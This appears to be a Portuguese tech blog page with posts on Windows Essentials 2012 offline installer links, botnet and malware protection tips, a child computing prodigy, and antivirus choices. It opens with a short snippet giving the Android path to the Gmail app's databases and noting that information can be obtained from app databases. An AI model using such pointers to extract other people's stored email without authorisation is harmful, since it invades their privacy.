Diretório de Banco de Dados de E-Mail
/data/data/com.google.android.providers.gmail/databases/


A maioria dos aplicativos tem um diretório de bancos de dados, pode-se obter o suficiente de  informação.

Baixar Windows Essentials 2012(Wave 5) - Instalador off line

MSN 2012

Vos deixo aqui os links para download o instalador offline do antigo Windows Live Essentials, agora Windows Essentials. Para instalá-lo, você precisará estar em um sistema mais atual da MS, sendo ele Win7 ou Win8. Divirtam-se:

LanguagesLang iDLinks
Arabicarhttp://g.live.com/1rewlive5-all/ar/wlsetup-all.exe
Bulgarianbghttp://g.live.com/1rewlive5-all/bg/wlsetup-all.exe
Catalancahttp://g.live.com/1rewlive5-all/ca/wlsetup-all.exe
Czechcshttp://g.live.com/1rewlive5-all/cs/wlsetup-all.exe
Danishdahttp://g.live.com/1rewlive5-all/da/wlsetup-all.exe
Germandehttp://g.live.com/1rewlive5-all/de/wlsetup-all.exe
Greekelhttp://g.live.com/1rewlive5-all/el/wlsetup-all.exe
Englishenhttp://g.live.com/1rewlive5-all/en/wlsetup-all.exe
Spanisheshttp://g.live.com/1rewlive5-all/es/wlsetup-all.exe
Estonianethttp://g.live.com/1rewlive5-all/et/wlsetup-all.exe
Basqueeuhttp://g.live.com/1rewlive5-all/eu/wlsetup-all.exe
Finnishfihttp://g.live.com/1rewlive5-all/fi/wlsetup-all.exe
Frenchfrhttp://g.live.com/1rewlive5-all/fr/wlsetup-all.exe
Gujaratiguhttp://g.live.com/1rewlive5-all/gu/wlsetup-all.exe
Hebrewhehttp://g.live.com/1rewlive5-all/he/wlsetup-all.exe
Hindihihttp://g.live.com/1rewlive5-all/hi/wlsetup-all.exe
Croatianhrhttp://g.live.com/1rewlive5-all/hr/wlsetup-all.exe
Hungarianhuhttp://g.live.com/1rewlive5-all/hu/wlsetup-all.exe
Indonesianidhttp://g.live.com/1rewlive5-all/id/wlsetup-all.exe
Italianithttp://g.live.com/1rewlive5-all/it/wlsetup-all.exe
Japanesejahttp://g.live.com/1rewlive5-all/ja/wlsetup-all.exe
Kannadaknhttp://g.live.com/1rewlive5-all/kn/wlsetup-all.exe
Koreankohttp://g.live.com/1rewlive5-all/ko/wlsetup-all.exe
Lithuanianlthttp://g.live.com/1rewlive5-all/lt/wlsetup-all.exe
Latvianlvhttp://g.live.com/1rewlive5-all/lv/wlsetup-all.exe
Malayalamml-inhttp://g.live.com/1rewlive5-all/ml-in/wlsetup-all.exe
Marathimrhttp://g.live.com/1rewlive5-all/mr/wlsetup-all.exe
Malaymshttp://g.live.com/1rewlive5-all/ms/wlsetup-all.exe
Dutchnlhttp://g.live.com/1rewlive5-all/nl/wlsetup-all.exe
Norwegian (Bokmal)nohttp://g.live.com/1rewlive5-all/no/wlsetup-all.exe
Polishplhttp://g.live.com/1rewlive5-all/pl/wlsetup-all.exe
Portuguese (Brazil)pt-brhttp://g.live.com/1rewlive5-all/pt-br/wlsetup-all.exe
Portuguese (Portugal)pt-pthttp://g.live.com/1rewlive5-all/pt-pt/wlsetup-all.exe
Romanianrohttp://g.live.com/1rewlive5-all/ro/wlsetup-all.exe
Russianruhttp://g.live.com/1rewlive5-all/ru/wlsetup-all.exe
Slovakskhttp://g.live.com/1rewlive5-all/sk/wlsetup-all.exe
Slovenianslhttp://g.live.com/1rewlive5-all/sl/wlsetup-all.exe
Serbian-Cyrillicsr-cyrl-cshttp://g.live.com/1rewlive5-all/sr-cyrl-cs/wlsetup-all.exe
Serbian-Latinsr-latn-cshttp://g.live.com/1rewlive5-all/sr-latn-cs/wlsetup-all.exe
Swedishsvhttp://g.live.com/1rewlive5-all/sv/wlsetup-all.exe
Tamiltahttp://g.live.com/1rewlive5-all/ta/wlsetup-all.exe
Telugutehttp://g.live.com/1rewlive5-all/te/wlsetup-all.exe
Thaithhttp://g.live.com/1rewlive5-all/th/wlsetup-all.exe
Turkishtrhttp://g.live.com/1rewlive5-all/tr/wlsetup-all.exe
Ukrainianukhttp://g.live.com/1rewlive5-all/uk/wlsetup-all.exe
Vietnamesevihttp://g.live.com/1rewlive5-all/vi/wlsetup-all.exe
Chinese (Simplified)zh-cnhttp://g.live.com/1rewlive5-all/zh-cn/wlsetup-all.exe
Chinese (Traditional)zh-twhttp://g.live.com/1rewlive5-all/zh-tw/wlsetup-all.exe

quarta-feira, 7 de novembro de 2012

Como proteger melhor seu PC com a proteção contra botnet e evitar malware

Os criminosos online trabalham incessantemente para incluir o seu computador em uma rede de computadores conhecida como botnet , que eles depois usam para cometer crimes. Saiba mais sobre botnets, proteção contra botnet e como você pode ajudar a proteger seu PC contra esses invasores.

O QUE É BOTNET?
O termo bot vem de robot Os criminosos distribuem um malware (software mal-intencionado) que pode transformar seu computador em um bot, também chamado de zumbi. Quando isso ocorre, seu computador pode realizar tarefas de forma automatizada na internet sem o seu conhecimento.
Os criminosos costumam usar bots para infectar grandes quantidades de computadores. Esses computadores formam uma rede, ou uma botnet.
Os botnets podem ser usados para enviar mensagens de spam, disseminar vírus, atacar computadores e servidores e cometer outros tipos de crimes e fraudes. Se o seu computador se tornar parte de um botnet, ele poderá ficar lento e você estará ajudando criminosos sem que o saiba.

COMO SABER SE O SEU COMPUTADOR ESTÁ INFECTADO COM MALWARE
Nem sempre é fácil saber se seu computador foi infectado com malware. Se ele estiver anormalmente lento, travar ou parar de responder com frequência, por exemplo, esses problemas podem ser sinais de que seu computador está infectado. No entanto, tais sintomas também podem indicar problemas relacionados a hardware ou software que não se relacionem a um malware. Por ser difícil detectar as razões para o comportamento anormal do computador, sugerimos que você siga estes passos:

  1. Obtenha uma lista mais completa de sintomas .
  2. Se, com base na lista completa dos sintomas, você achar que seu computador foi infectado, deixe que a Microsoft ajude a diagnosticar e resolver o problema .


COMO AJUDAR A EVITAR MALWARE
Os criminosos online utilizam duas estratégias básicas para penetrar nas defesas do seu computador e inscrever computadores em seus botnets:
  • Eles instalam malware em um computador se aproveitando de eventuais vulnerabilidades em seu software ou invadindo contas protegidas por senhas fracas.
  • Eles tentam dissuadi-lo a instalar um malware.
Para ajudar a proteger seu computador contra bots, siga as recomendações abaixo. Para instruções específicas, consulte Como aumentar sua defesa contra malware e proteger seu PC .
Reforce as defesas do seu computador
  1. Instale programas antivírus e antispyware de uma fonte confiável. Os programas antimalware verificam e monitoram o computador em busca de vírus e spywares conhecidos. Quando encontram algo, esses programas o notificam e o ajudam a tomar as medidas necessárias.
  2. Mantenha todos os softwares atualizados. Instale regularmente as atualizações de todos os seus softwares e inscreva-se para receber atualizações automáticas, sempre que possível.
  3. Use senhas fortes e nunca as revele. Use nosso verificador de senha para determinar a força da sua senha .
  4. Nunca desative seu firewall. O firewall coloca uma barreira protetora entre seu computador e a Internet. Desativá-lo, mesmo que por um minuto, aumenta o risco de seu PC ser infectado com malware.
  5. Use unidades flash com cautela. Colocar sua unidade flash (às vezes chamada de pen drive) em um computador infectado pode corromper a unidade e, por fim, o seu computador.
Não seja dissuadido a baixar malware
Invasores podem incluir o seu computador em uma botnet:
  • Inserindo malware em downloads que parecem ser imagens ou filmes, ou por meio de links clicados em e-mails ou mensagens instantâneas (IM), ou em redes sociais.
  • Assustando você e induzindo-o a clicar em um botão ou link que apresenta falsos avisos de que seu computador tem um vírus.


terça-feira, 6 de novembro de 2012

Menino de 9 anos vira Engenheiro de Software


Um menino macedônio de apenas 9 anos de idade é um gênio da computação. Marko Calasan recebeu, com apenas 06 anos, uma certificação da Microsoft como Administrador de Sistemas e agora se certificou como Engenheiro de Sistemas.

Marko disse em entrevista ao site CNET.com que não joga games de computador porque não há nada sério nisso. “Se eu quiser brincar, eu saio de casa e encontro meus amigos“, afirma. A computação é mais que um hobbie para o menino: ele passa cerca de quatro horas por dia na frente de uma máquina, mas algumas vezes fica mais de 10 horas.



O menino prodígio já trabalha como administrador de sistemas em uma ONG onde trabalha com pessoas deficientes e tem seu próprio laboratório de computadores. O luga, conta com apenas 15 computadores fornecidos pelo ministério da educação de seu país. Marko ensina crianças de 8 a 11 anos a usarem ferramentas básicas do computador. Seu talento é tão reconhecido que ele tem autorização governamental para faltar às vezes à escola.

O próximo passo de Marko é encontrar uma maneira de transmitir sinais televisivos de alta definição por uma rede DSL normal sem ter problemas na imagem. Para ajudá-lo, uma companhia de telecomunicações concedeu a ele uma conexão direta com sua rede principal. Ele também fará uma apresentação na feira de eletrônicos CeBIT, que acontecerá neste ano em Hanôver, na Alemanha.

Qual AntiVirus Devo Usar

Bom, muita gente se faz essa pergunta, qual usar, qual é melhor etc. todos sabem que Antivirus servem como uma barreira para proteger seu computador e suas informações, mas será que somente um Antivirus te protege? Não, um Antivirus não tem todo esse "poder", os Antivirus trabalham em conjunto com outras ferramentas de segurança e a mais conhecida delas é a Parede de fogo (em inglês: Firewall) é um dispositivo de uma rede de computadores que tem por objetivo aplicar uma política de segurança a um determinado ponto da rede. O firewall pode ser do tipo filtros de pacotes, proxy de aplicações, etc. Os Firewall's são geralmente associados a redes TCP/IP.
Este dispositivo de segurança existe na forma de software e de hardware, a combinação de ambos normalmente é chamado de "appliance". A complexidade de instalação depende do tamanho da rede, da política de segurança, da quantidade de regras que controlam o fluxo de entrada e saída de informações e do grau de segurança desejado.wikipedia; O Firewall é muito importante em qualquer área seja ela empresarial ou domestica, um bom firewall free é ZoneAlarm o mesmo age como uma barreira como já foi dito, agora vamos a questão que define o titulo desse post, Qual Antivirus usar, alguns optam por usar um Antivirus Free por achar muito caro e/ou acha que nunca irá ser vitima de alguma invasão, Antivirus pagos possui mais vantagens e recursos que os Free's não tem, por exemplo o ESET Smart Security 5 incorpora firewall e antispam ao renomado ESET NOD32 Antivirus, protegendo seu equipamento e informações dos ataques da Internet e de e-mails com lixo eletrônico. Além disso, a solução agora permite que você proteja seus filhos de conteúdo inapropriado que circula pela web, utilizando o controle dos pais. 
O NOD32 Smart Security é um ótimo TUDO que você poderia estar adquirindo e não iria se arrepender de te-lo em seu PC, eu mesmo tenho o mesmo e nunca me decepcionou, mas se você quiser outras opções citarei alguns softwares Free's e pagos todos aprovados pela gama computacional. Uma coisa muito importante de se dizer nessa postagem é, mantenha seu computador atualizado e seus programas de proteção também, máquinas desatualizadas e seus Antivirus na mesma situação, são alvos fáceis, portanto mantenha seu PC atualizado e nos trinques, obrigado por ler essa postagem e até a próxima.(links dos softwares abaixo)